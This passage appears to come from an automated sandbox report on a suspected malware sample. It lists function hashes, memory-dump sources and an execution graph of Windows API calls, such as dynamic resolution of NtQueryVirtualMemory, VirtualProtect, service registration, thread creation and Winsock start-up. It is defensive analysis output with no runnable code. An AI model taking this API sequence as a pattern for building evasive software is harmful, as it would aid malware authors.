                                                          • Opcode Fuzzy Hash: e905bd158df02625dc270cad0cc5a95eb185c14d731b7419937fbf6b616716f3
                                                          • Instruction Fuzzy Hash: 90425821A0DAC64FE356B77C48751B4BBE1EF57620B8802FAD089C71D7DE18AC56C392
                                                          Function 00007FF7BFD43D5A Relevance: .1, Instructions: 144COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1607109860.00007FF7BFD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFD40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7ff7bfd40000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 87b9ec4fe9ff98d97744beba33cb57751d593f3429fdf9cc8c6b3615bed487f9
                                                          • Instruction ID: e4101cc7b0183711d9659979136f26c17e31b97e1fadf4a1d7c5925d82a18042
                                                          • Opcode Fuzzy Hash: 87b9ec4fe9ff98d97744beba33cb57751d593f3429fdf9cc8c6b3615bed487f9
                                                          • Instruction Fuzzy Hash: 8241E562E0EEC70BF399B6BC08752F8E6D2AF62A60BD802F9C10DC35D6DE199C145251
                                                          Function 00007FF7BFD440F7 Relevance: .1, Instructions: 77COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1607109860.00007FF7BFD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFD40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7ff7bfd40000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 07509fd91cc301ae11601d1bbc03625a02211b2d9ffb41340fa734fde2a3a5c1
                                                          • Instruction ID: 373ea2ac0dbaa78ccf8c61ebf86323aa9906672c52253a844c906dc15c932a36
                                                          • Opcode Fuzzy Hash: 07509fd91cc301ae11601d1bbc03625a02211b2d9ffb41340fa734fde2a3a5c1
                                                          • Instruction Fuzzy Hash: 47110B23E0D94A4BB2A8B65C61761FC92C1EFB7A60FC402F6DD0EC3589DE096C8109D2
                                                          Function 00007FF7BFC73A05 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1606377344.00007FF7BFC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFC70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7ff7bfc70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                          • Instruction ID: a761a63bfd00b0a1f8064764b54b962c4c127c547928a269d3f40d43862e86d5
                                                          • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                          • Instruction Fuzzy Hash: D701A73110CB0C4FD744EF0CE051AA5B3E0FB95360F10052DE58AC3651D732E881CB41
                                                          Function 00007FF7BFD404D8 Relevance: .0, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1607109860.00007FF7BFD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFD40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7ff7bfd40000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e7b0feb34ffcb48b3bab9f346e52c630ea6c3e7091d1349b9f69da35fc7e9b90
                                                          • Instruction ID: 8f7718e05c21971d52c8729b04072e3530c1e36424d4711c28da69bb6c3c218b
                                                          • Opcode Fuzzy Hash: e7b0feb34ffcb48b3bab9f346e52c630ea6c3e7091d1349b9f69da35fc7e9b90
                                                          • Instruction Fuzzy Hash: 9EE0D833E4D8A90EB7A6B5DC242D1F8A2C1EF69A31B8402B7D91DC3149DD009C1043D2

                                                          Non-executed Functions

                                                          Function 00007FF7BFD40FB6 Relevance: .6, Instructions: 570COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.1607109860.00007FF7BFD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFD40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7ff7bfd40000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b8a09dfe2beeff5de02b28283aa32ef6957fcc90bfe341b1d029d44a6c7a0305
                                                          • Instruction ID: 453705f8de08186833b6b3b186b9949d34a4834ae84b78c0efe2e6fa3b004b81
                                                          • Opcode Fuzzy Hash: b8a09dfe2beeff5de02b28283aa32ef6957fcc90bfe341b1d029d44a6c7a0305
                                                          • Instruction Fuzzy Hash: 5B028A31A0DACA4FD796FB6C84666F4BBE1FF66610B4802FEC14DC7197CA249806C791

                                                          Execution Graph

                                                          Execution Coverage:16.6%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:7.1%
                                                          Total number of Nodes:535
                                                          Total number of Limit Nodes:13
                                                          execution_graph 3004 2f7f617 3005 2f7f634 3004->3005 3006 2f7f61d 3004->3006 3008 2f7ef98 3006->3008 3009 2f7ee3c 13 API calls 3008->3009 3010 2f7efc7 3009->3010 3011 2f7ee54 2 API calls 3010->3011 3012 2f7effc 3010->3012 3011->3012 3012->3005 2434 346d444 2437 2f81764 GetModuleHandleW 2434->2437 2436 346d454 2438 2f8179f 2437->2438 2438->2436 2439 3435340 LoadLibraryA GetProcAddress 2444 2f7cd60 2439->2444 2441 3435393 2447 34351e8 2441->2447 2450 2f7cab8 2444->2450 2446 2f7cd6a 2446->2441 2676 3435180 2447->2676 2451 2f7cadb 2450->2451 2453 2f7caf6 2450->2453 2451->2446 2452 2f7cb64 2460 2f7cbcb 2452->2460 2461 2f7ca74 2452->2461 2453->2452 2455 2f7cc31 2453->2455 2455->2460 2478 2f7c100 2455->2478 2456 2f7cab8 32 API calls 2456->2460 2458 2f7cb7c 2458->2460 2471 2f7bfd8 2458->2471 2460->2451 2460->2456 2482 2f811f8 2461->2482 2463 2f7ca7d 2464 2f7ca85 2463->2464 2465 2f7ca93 2463->2465 2466 2f811f8 11 API calls 2464->2466 2468 2f811f8 11 API calls 2465->2468 2467 2f7ca8a 2466->2467 2467->2458 2469 2f7caa1 2468->2469 2470 2f811f8 11 API calls 2469->2470 2470->2467 2472 2f7bff4 2471->2472 2473 2f7c038 2471->2473 2472->2473 2476 2f7c072 2472->2476 2477 2f7c0a1 2472->2477 2473->2460 2474 2f7bfd8 32 API calls 2474->2476 2476->2473 2476->2474 2477->2473 2525 2f7bcfc 2477->2525 2479 2f7c111 2478->2479 2480 2f7c109 2478->2480 2479->2460 2652 2f7bec0 2480->2652 2483 2f8122d TlsGetValue 2482->2483 2484 2f81207 2482->2484 2485 2f81212 2483->2485 2486 2f81237 2483->2486 2484->2463 2490 2f811b4 2485->2490 2486->2463 2489 2f81226 2489->2463 2492 2f811ba 2490->2492 2491 2f811e8 TlsGetValue 2491->2489 2492->2491 2493 2f811d3 2492->2493 2500 2f79cc8 2492->2500 2503 2f811a0 LocalAlloc 2493->2503 2496 2f811da 2497 2f811ea TlsSetValue 2496->2497 2498 2f811de 2496->2498 2497->2491 2499 2f79cc8 10 API calls 2498->2499 2499->2491 2504 2f79cbc 2500->2504 2503->2496 2507 2f79b8c 2504->2507 2508 2f79bb2 2507->2508 2509 2f79ba8 2507->2509 2510 2f79bc2 GetCurrentThreadId 2508->2510 2512 2f79bcf 2508->2512 2517 2f79af4 2509->2517 2510->2512 2513 2f76fa0 8 API calls 2512->2513 2514 2f79c5f FreeLibrary 2512->2514 2515 2f79c87 ExitProcess 2512->2515 2513->2512 2514->2512 2518 2f79afe GetStdHandle WriteFile 2517->2518 2519 2f79b5b 2517->2519 2523 2f7a91c 2518->2523 2519->2508 2522 2f79b4b GetStdHandle WriteFile 2522->2508 2524 2f7a922 2523->2524 2524->2522 2526 2f7be9b 2525->2526 2529 2f7bd1f 2525->2529 2526->2477 2527 2f7bfd8 32 API calls 2527->2529 2528 2f7bcfc 32 API calls 2528->2529 2529->2526 2529->2527 2529->2528 2532 2f7f908 2529->2532 2538 2f7f8dc 2529->2538 2533 2f7f91a 2532->2533 2534 2f7f8dc 14 API calls 2533->2534 2535 2f7f92f 2534->2535 2542 2f7f870 2535->2542 2537 2f7f946 2537->2529 2539 2f7f8e7 2538->2539 2540 2f7f901 2538->2540 2642 2f7f8a8 2539->2642 2540->2529 2543 2f7f8a3 2542->2543 2544 2f7f87b 2542->2544 2543->2537 2546 2f7f4b0 2544->2546 2547 2f7f4d4 2546->2547 2548 2f7f4cc 2546->2548 2568 2f7f1f0 2547->2568 2558 2f7f34c 2548->2558 2551 2f7f4fc 2557 2f7f53f 2551->2557 2572 2f7f2b8 2551->2572 2583 2f7f258 2557->2583 2559 2f7f365 2558->2559 2560 2f7f3f9 2558->2560 2561 2f7f376 2559->2561 2587 2f788d4 2559->2587 2560->2547 2591 2f78a30 2561->2591 2564 2f7f3d4 2609 2f78bc8 2564->2609 2567 2f7f3a5 2567->2564 2606 2f7f1dc 2567->2606 2569 2f7f203 2568->2569 2570 2f7f1f9 2568->2570 2569->2551 2571 2f78a30 13 API calls 2570->2571 2571->2569 2573 2f7f2c0 2572->2573 2574 2f7f2c9 2573->2574 2638 2f7ed88 2573->2638 2576 2f7f06c 2574->2576 2577 2f7f086 2576->2577 2578 2f7f08f 2577->2578 2580 2f7f0a9 2577->2580 2579 2f7cd60 32 API calls 2578->2579 2582 2f7f0a4 2579->2582 2581 2f7cd60 32 API calls 2580->2581 2580->2582 2581->2582 2582->2557 2584 2f7f261 2583->2584 2585 2f7f268 2583->2585 2586 2f78bc8 2 API calls 2584->2586 2585->2543 2586->2585 2588 2f788dd 2587->2588 2590 2f788e2 2587->2590 2614 2f787a8 GetModuleHandleW GetProcAddress 2588->2614 2590->2561 2599 2f78a3e 2591->2599 2593 2f78a8c 2593->2567 2594 2f78a67 GetTickCount 2594->2599 2595 2f78b10 GetTickCount 2632 2f78c28 2595->2632 2596 2f78a7f GetTickCount 2596->2593 2596->2599 2597 2f78ad9 GetTickCount 2597->2593 2597->2599 2599->2593 2599->2594 2599->2595 2599->2596 2599->2597 2600 2f78aae GetCurrentThreadId 2599->2600 2620 2f78ebc GetCurrentThreadId 2599->2620 2625 2f786ec 2599->2625 2600->2593 2602 2f78b3a GetTickCount 2603 2f78b20 2602->2603 2603->2595 2603->2602 2604 2f78ba4 2603->2604 2604->2593 2605 2f78baa GetCurrentThreadId 2604->2605 2605->2593 2607 2f788d4 5 API calls 2606->2607 2608 2f7f1e4 2607->2608 2608->2567 2636 2f788bc GetCurrentThreadId 2609->2636 2611 2f78bd3 2611->2611 2612 2f78c28 Sleep 2611->2612 2613 2f78bff 2611->2613 2612->2613 2613->2560 2615 2f787d0 GetLogicalProcessorInformation 2614->2615 2619 2f78818 2614->2619 2616 2f787df GetLastError 2615->2616 2615->2619 2617 2f787e9 2616->2617 2616->2619 2618 2f787f1 GetLogicalProcessorInformation 2617->2618 2618->2619 2619->2590 2621 2f78ec9 2620->2621 2623 2f78ed0 2620->2623 2621->2599 2622 2f78ef7 2622->2599 2623->2622 2624 2f78ee4 GetCurrentThreadId 2623->2624 2624->2622 2626 2f786f7 2625->2626 2627 2f78726 2626->2627 2628 2f7871d Sleep 2626->2628 2629 2f78745 2626->2629 2630 2f78735 Sleep 2627->2630 2631 2f7873e SwitchToThread 2627->2631 2628->2629 2629->2599 2630->2629 2631->2629 2633 2f78c81 2632->2633 2634 2f78c3a 2632->2634 2633->2603 2634->2633 2635 2f78c68 Sleep 2634->2635 2635->2634 2637 2f788c9 2636->2637 2637->2611 2639 2f7ed93 2638->2639 2640 2f788d4 5 API calls 2639->2640 2641 2f7ed9a 2640->2641 2641->2574 2643 2f7f8ac 2642->2643 2644 2f7f8b9 2642->2644 2646 2f7f588 2643->2646 2644->2540 2647 2f7f5a8 2646->2647 2651 2f7f60f 2646->2651 2648 2f7f1f0 13 API calls 2647->2648 2649 2f7f5d0 2648->2649 2650 2f7f258 2 API calls 2649->2650 2650->2651 2651->2644 2653 2f7bed5 2652->2653 2654 2f7bef2 2652->2654 2655 2f7bf26 2653->2655 2656 2f7beda 2653->2656 2654->2479 2655->2654 2662 2f7a2ec 2655->2662 2656->2654 2658 2f7bf65 2656->2658 2659 2f7bee9 2656->2659 2658->2654 2660 2f7bec0 32 API calls 2658->2660 2659->2654 2669 2f7bb54 2659->2669 2660->2658 2663 2f7a313 2662->2663 2664 2f7a2f0 2662->2664 2663->2655 2665 2f7a303 SysReAllocStringLen 2664->2665 2668 2f79e78 2664->2668 2665->2663 2665->2668 2666 2f79ee6 SysFreeString 2667 2f79ef4 2666->2667 2667->2655 2668->2666 2668->2667 2672 2f7bb79 2669->2672 2673 2f7bce3 2669->2673 2670 2f7f908 32 API calls 2670->2672 2671 2f7a2ec 2 API calls 2671->2672 2672->2670 2672->2671 2672->2673 2674 2f7bec0 32 API calls 2672->2674 2675 2f7bb54 32 API calls 2672->2675 2673->2659 2674->2672 2675->2672 2681 311bf68 2676->2681 2678 34351d5 2679 34351a3 2679->2678 2680 311bf68 14 API calls 2679->2680 2680->2678 2682 311bf8e 2681->2682 2687 311c878 2682->2687 2684 311bfa0 2685 311bfa4 VirtualProtect 2684->2685 2686 311bfbd 2684->2686 2685->2686 2686->2679 2689 311c88f 2687->2689 2688 311ca24 2690 311ca2c 2688->2690 2704 311ca4a 2688->2704 2689->2688 2691 311c990 LoadLibraryW 2689->2691 2692 311c974 LoadLibraryW 2689->2692 2693 311c9f4 LoadLibraryW 2689->2693 2694 311c958 LoadLibraryW 2689->2694 2695 311c9db LoadLibraryW 2689->2695 2696 311c93c LoadLibraryW 2689->2696 2697 311c920 LoadLibraryW 2689->2697 2698 311c9c2 LoadLibraryW 2689->2698 2699 311c904 LoadLibraryW 2689->2699 2700 311c9a9 LoadLibraryW 2689->2700 2701 311c8e8 LoadLibraryW 2689->2701 2702 311ca0d LoadLibraryW 2689->2702 2706 311cb90 2690->2706 2691->2688 2692->2688 2693->2688 2694->2688 2695->2688 2696->2688 2697->2688 2698->2688 2699->2688 2700->2688 2701->2688 2702->2688 2704->2684 2705 311ca37 2705->2704 2708 311cbac 2706->2708 2707 311ccc8 2707->2705 2708->2707 2709 311cca3 LoadLibraryW 2708->2709 2709->2708 3013 3435920 3022 2f778e8 3013->3022 3016 3435959 3018 3435968 GetVersionExW 3016->3018 3017 343597d 3019 34359aa LoadLibraryW 3017->3019 3021 34359cd 3017->3021 3018->3017 3024 2f83758 3019->3024 3023 2f778ef GetVersionExW 3022->3023 3023->3016 3023->3017 3025 2f83780 GetProcAddress 3024->3025 3027 2f8378c 3024->3027 3026 2f837d0 3025->3026 3026->3021 3028 2f837b1 GetProcAddress 3027->3028 3028->3026 2866 2f75f50 2867 2f75f60 2866->2867 2868 2f75fe8 2866->2868 2869 2f75fa4 2867->2869 2870 2f75f6d 2867->2870 2871 2f75ff1 2868->2871 2872 2f75888 2868->2872 2876 2f759d4 10 API calls 2869->2876 2873 2f75f78 2870->2873 2880 2f759d4 10 API calls 2870->2880 2875 2f76009 2871->2875 2887 2f76118 2871->2887 2874 2f76263 2872->2874 2878 2f758ac VirtualQuery 2872->2878 2879 2f7598b 2872->2879 2884 2f7602c 2875->2884 2888 2f760f0 2875->2888 2889 2f76010 2875->2889 2877 2f75fbb 2876->2877 2890 2f75953 2878->2890 2897 2f758e5 2878->2897 2886 2f759d4 10 API calls 2879->2886 2901 2f7593e 2879->2901 2882 2f75f85 2880->2882 2881 2f7617c 2883 2f759d4 10 API calls 2881->2883 2902 2f76195 2881->2902 2883->2902 2884->2889 2892 2f7606c Sleep 2884->2892 2886->2901 2887->2881 2894 2f76154 Sleep 2887->2894 2887->2902 2891 2f759d4 10 API calls 2888->2891 2903 2f759d4 2890->2903 2900 2f760f9 2891->2900 2892->2889 2895 2f76084 Sleep 2892->2895 2894->2881 2898 2f7616e Sleep 2894->2898 2895->2884 2896 2f75912 VirtualAlloc 2896->2890 2899 2f75928 VirtualAlloc 2896->2899 2897->2890 2897->2896 2898->2887 2899->2890 2899->2901 2904 2f75c34 2903->2904 2905 2f759ec 2903->2905 2906 2f75bf8 2904->2906 2907 2f75d4c 2904->2907 2914 2f759fe 2905->2914 2917 2f75a89 Sleep 2905->2917 2916 2f75c12 Sleep 2906->2916 2919 2f75c52 2906->2919 2908 2f75d55 2907->2908 2909 2f75780 VirtualAlloc 2907->2909 2908->2901 2911 2f757db 2909->2911 2912 2f757ab 2909->2912 2910 2f75a0d 2910->2901 2911->2901 2928 2f75734 2912->2928 2914->2910 2915 2f75aec 2914->2915 2922 2f75acd Sleep 2914->2922 2927 2f75af8 2915->2927 2933 2f756b8 2915->2933 2916->2919 2920 2f75c28 Sleep 2916->2920 2917->2914 2921 2f75a9f Sleep 2917->2921 2923 2f756b8 VirtualAlloc 2919->2923 2924 2f75c70 2919->2924 2920->2906 2921->2905 2922->2915 2926 2f75ae3 Sleep 2922->2926 2923->2924 2924->2901 2926->2914 2927->2901 2929 2f7573d 2928->2929 2930 2f7577c 2928->2930 2929->2930 2931 2f75748 Sleep 2929->2931 2930->2911 2931->2930 2932 2f75762 Sleep 2931->2932 2932->2929 2937 2f7564c 2933->2937 2935 2f756c1 VirtualAlloc 2936 2f756d8 2935->2936 2936->2927 2938 2f755ec 2937->2938 2938->2935 3029 3435824 3030 2f778e8 3029->3030 3031 3435854 VerSetConditionMask VerifyVersionInfoW 3030->3031 3032 34358a5 3031->3032 2958 2f817b0 2959 2f817db 2958->2959 2960 2f8184c RaiseException 2959->2960 2961 2f81874 2959->2961 2977 2f818e1 2960->2977 2962 2f81909 LoadLibraryA 2961->2962 2963 2f81914 2961->2963 2968 2f81987 2961->2968 2961->2977 2962->2963 2966 2f81918 GetLastError 2963->2966 2967 2f81963 2963->2967 2964 2f81a13 2965 2f81a17 GetLastError 2964->2965 2964->2977 2970 2f81a28 2965->2970 2971 2f81929 2966->2971 2974 2f81971 2967->2974 2975 2f819a4 FreeLibrary 2967->2975 2968->2964 2969 2f81a07 GetProcAddress 2968->2969 2968->2977 2969->2964 2972 2f81a3a RaiseException 2970->2972 2970->2977 2971->2967 2973 2f8193b RaiseException 2971->2973 2972->2977 2973->2977 2974->2968 2976 2f81977 LocalAlloc 2974->2976 2975->2968 2976->2968 3033 311fbf8 3034 311fc17 3033->3034 3035 311fc02 3033->3035 3036 311fc27 3035->3036 3037 311fc09 3035->3037 3045 311fb08 3036->3045 3037->3034 3040 311f1d4 3037->3040 3041 311f1e2 VariantClear 3040->3041 3042 311f1ef 3040->3042 3043 311f1ed 3041->3043 3042->3043 3044 311f25a VariantClear VariantInit 3042->3044 3043->3034 3044->3043 3046 311fb1e 3045->3046 3047 311fb17 3045->3047 3049 311fb2e VariantCopy 3046->3049 3050 311fb3f 3046->3050 3048 311f1d4 3 API calls 3047->3048 3048->3046 3052 311fb3a 3049->3052 3051 311fbe7 VariantCopy 3050->3051 3050->3052 3051->3052 3052->3034 2939 342a408 2940 342a44b 2939->2940 2941 342a4a4 RegisterServiceCtrlHandlerExW 2940->2941 2942 342a4b8 SetServiceStatus 2941->2942 2943 342a519 2941->2943 2949 2f79d58 2942->2949 2953 2f79ee0 2943->2953 2946 342a4ff 2948 342a506 Sleep 2946->2948 2948->2943 2948->2948 2950 2f79d75 2949->2950 2951 2f79d94 CreateThread 2950->2951 2952 2f79dbd 2951->2952 2956 2f79d20 2951->2956 2952->2946 2954 2f79ee6 SysFreeString 2953->2954 2955 2f79ef4 2953->2955 2954->2955 2957 2f79d28 2956->2957 2433 3459234 WSAStartup GetLastError 2978 311c800 LoadLibraryW LoadLibraryW LoadLibraryW 3053 2f79704 3054 2f79715 3053->3054 3055 2f7979e 3053->3055 3056 2f7971e UnhandledExceptionFilter 3054->3056 3058 2f79664 3054->3058 3056->3055 3056->3058 3057 2f79776 3058->3057 3061 2f76fe0 3058->3061 3062 2f79cbc 11 API calls 3061->3062 3063 2f76feb 3062->3063 2710 311ebe4 2715 2f8007c 2710->2715 2712 311ec04 2720 2f79558 2712->2720 2716 2f80084 2715->2716 2716->2716 2719 2f800d1 2716->2719 2726 2f7d28c 2716->2726 2718 2f800c0 LoadStringW 2718->2719 2719->2712 2721 2f79566 2720->2721 2722 2f7955c 2720->2722 2725 2f795a4 2721->2725 2863 2f76fd4 2721->2863 2723 2f79cc8 11 API calls 2722->2723 2723->2721 2727 2f7d29a 2726->2727 2728 2f7d2b9 2726->2728 2727->2728 2731 2f7d244 2727->2731 2728->2718 2732 2f7d254 GetModuleFileNameW 2731->2732 2733 2f7d270 2731->2733 2735 2f7e4b8 GetModuleFileNameW 2732->2735 2733->2718 2736 2f7e506 2735->2736 2741 2f7e394 2736->2741 2738 2f7e532 2739 2f7e544 LoadLibraryExW 2738->2739 2740 2f7e54c 2738->2740 2739->2740 2740->2733 2743 2f7e3b5 2741->2743 2742 2f7e43d 2742->2738 2743->2742 2759 2f7e0d0 2743->2759 2745 2f7e42a 2746 2f7e430 2745->2746 2747 2f7e43f GetUserDefaultUILanguage 2745->2747 2748 2f7e1fc 2 API calls 2746->2748 2763 2f7da80 EnterCriticalSection 2747->2763 2748->2742 2750 2f7e44c 2783 2f7e1fc 2750->2783 2752 2f7e459 2753 2f7e481 2752->2753 2754 2f7e467 GetSystemDefaultUILanguage 2752->2754 2753->2742 2787 2f7e2c8 2753->2787 2755 2f7da80 17 API calls 2754->2755 2757 2f7e474 2755->2757 2758 2f7e1fc 2 API calls 2757->2758 2758->2753 2760 2f7e0f2 2759->2760 2762 2f7e0fc 2759->2762 2795 2f7ddb4 2760->2795 2762->2745 2764 2f7dacc LeaveCriticalSection 2763->2764 2765 2f7daac 2763->2765 2832 2f79e98 2764->2832 2767 2f7dabd LeaveCriticalSection 2765->2767 2769 2f7db6e 2767->2769 2768 2f7dadd IsValidLocale 2770 2f7daec 2768->2770 2771 2f7db3b EnterCriticalSection 2768->2771 2769->2750 2772 2f7daf5 2770->2772 2773 2f7db00 2770->2773 2778 2f7db53 2771->2778 2834 2f7d964 GetThreadUILanguage 2772->2834 2847 2f7d768 2773->2847 2776 2f7dafe 2776->2771 2777 2f7db09 GetSystemDefaultUILanguage 2777->2771 2780 2f7db13 2777->2780 2779 2f7db64 LeaveCriticalSection 2778->2779 2779->2769 2781 2f7db24 GetSystemDefaultUILanguage 2780->2781 2782 2f7d768 3 API calls 2781->2782 2782->2776 2785 2f7e21a 2783->2785 2784 2f7e295 2784->2752 2785->2784 2856 2f7e190 2785->2856 2861 2f79f7c 2787->2861 2790 2f7e318 2791 2f7e190 2 API calls 2790->2791 2793 2f7e32c 2791->2793 2792 2f7e35a 2792->2742 2793->2792 2794 2f7e190 2 API calls 2793->2794 2794->2792 2796 2f7ddcb 2795->2796 2797 2f7dddf GetModuleFileNameW 2796->2797 2798 2f7ddf4 2796->2798 2797->2798 2799 2f7dfc3 2798->2799 2800 2f7de1c RegOpenKeyExW 2798->2800 2799->2762 2801 2f7de43 RegOpenKeyExW 2800->2801 2802 2f7dedd 2800->2802 2801->2802 2804 2f7de61 RegOpenKeyExW 2801->2804 2816 2f7dbc4 GetModuleHandleW 2802->2816 2804->2802 2806 2f7de7f RegOpenKeyExW 2804->2806 2805 2f7defb RegQueryValueExW 2807 2f7df4c RegQueryValueExW 2805->2807 2808 2f7df19 2805->2808 2806->2802 2809 2f7de9d RegOpenKeyExW 2806->2809 2812 2f7df68 2807->2812 2814 2f7df4a 2807->2814 2811 2f7df21 RegQueryValueExW 2808->2811 2809->2802 2810 2f7debb RegOpenKeyExW 2809->2810 2810->2799 2810->2802 2811->2814 2815 2f7df70 RegQueryValueExW 2812->2815 2813 2f7dfb2 RegCloseKey 2813->2762 2813->2799 2814->2813 2815->2814 2817 2f7dbec GetProcAddress 2816->2817 2818 2f7dbfd 2816->2818 2817->2818 2822 2f7dc13 2818->2822 2826 2f7dc5f 2818->2826 2828 2f7dba0 2818->2828 2821 2f7dba0 CharNextW 2821->2826 2822->2805 2823 2f7dba0 CharNextW 2823->2826 2824 2f7dce4 FindFirstFileW 2824->2822 2825 2f7dd00 FindClose lstrlenW 2824->2825 2825->2822 2825->2826 2826->2822 2826->2823 2826->2824 2827 2f7dd4e lstrlenW 2826->2827 2827->2826 2829 2f7dbae 2828->2829 2830 2f7dbbc 2829->2830 2831 2f7dba6 CharNextW 2829->2831 2830->2821 2830->2822 2831->2829 2833 2f79e9e 2832->2833 2833->2768 2835 2f7d980 2834->2835 2836 2f7d9d9 2834->2836 2852 2f7d920 GetThreadPreferredUILanguages 2835->2852 2838 2f7d920 2 API calls 2836->2838 2845 2f7d9e1 2838->2845 2840 2f7da28 SetThreadPreferredUILanguages 2842 2f7d920 2 API calls 2840->2842 2843 2f7da3e 2842->2843 2844 2f7da59 SetThreadPreferredUILanguages 2843->2844 2846 2f7da69 2843->2846 2844->2846 2845->2840 2845->2846 2846->2776 2850 2f7d7a3 2847->2850 2848 2f7d80c IsValidLocale 2849 2f7d81f GetLocaleInfoW GetLocaleInfoW 2848->2849 2851 2f7d85a 2848->2851 2849->2851 2850->2848 2850->2851 2851->2777 2853 2f7d941 2852->2853 2854 2f7d95a SetThreadPreferredUILanguages 2852->2854 2855 2f7d94a GetThreadPreferredUILanguages 2853->2855 2854->2836 2855->2854 2857 2f7e1a5 2856->2857 2858 2f7e1c2 FindFirstFileW 2857->2858 2859 2f7e1d2 FindClose 2858->2859 2860 2f7e1d8 2858->2860 2859->2860 2860->2785 2862 2f79f80 GetUserDefaultUILanguage GetLocaleInfoW 2861->2862 2862->2790 2864 2f811f8 11 API calls 2863->2864 2865 2f76fd9 2864->2865 2865->2725 3064 2f7974a 3065 2f79664 3064->3065 3066 2f79776 3064->3066 3065->3066 3067 2f76fe0 11 API calls 3065->3067 3068 2f796fe 3067->3068 2979 2f76268 2980 2f759d4 10 API calls 2979->2980 2981 2f76274 2980->2981 2982 2f7f568 2985 2f7eea8 2982->2985 2984 2f7f57f 2996 2f7ee3c 2985->2996 2988 2f7ef35 2990 2f7cd60 32 API calls 2988->2990 2989 2f7ef4f 2991 2f7cd60 32 API calls 2989->2991 2992 2f7ef4a 2990->2992 2991->2992 3000 2f7ee54 2992->3000 2993 2f7ef09 2993->2984 2997 2f7ee45 2996->2997 2998 2f7ee50 2996->2998 2999 2f78a30 13 API calls 2997->2999 2998->2988 2998->2989 2998->2993 2999->2998 3001 2f7ee65 3000->3001 3002 2f7ee5d 3000->3002 3001->2984 3003 2f78bc8 2 API calls 3002->3003 3003->3001

                                                          Executed Functions

                                                          Function 03435340 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(ntdll.dll,NtQueryVirtualMemory), ref: 0343535F
                                                          • GetProcAddress.KERNEL32(00000000,ntdll.dll), ref: 03435365
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: NtQueryVirtualMemory$ntdll.dll
                                                          • API String ID: 2574300362-2623246514
                                                          • Opcode ID: 4731a88360ac64b859ae3e3dca95633bdcdba51247b4b59cc755e759f541e5ba
                                                          • Instruction ID: e038cb8088844124e055c38250cf50b75bda3e5ae076daf375e6ad0f2ebd4386
                                                          • Opcode Fuzzy Hash: 4731a88360ac64b859ae3e3dca95633bdcdba51247b4b59cc755e759f541e5ba
                                                          • Instruction Fuzzy Hash: C301A239604208DFD700FFA5E842A4E77E2E74E340F1041A6D8117F78AE77169008F49
                                                          Function 02F7E2C8 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,02F7E388,?,?), ref: 02F7E2FA
                                                          • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,02F7E388,?,?), ref: 02F7E303
                                                            • Part of subcall function 02F7E190: FindFirstFileW.KERNEL32(00000000,?,00000000,02F7E1EE,?,00000001), ref: 02F7E1C3
                                                            • Part of subcall function 02F7E190: FindClose.KERNEL32(00000000,00000000,?,00000000,02F7E1EE,?,00000001), ref: 02F7E1D3
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmpDownload File
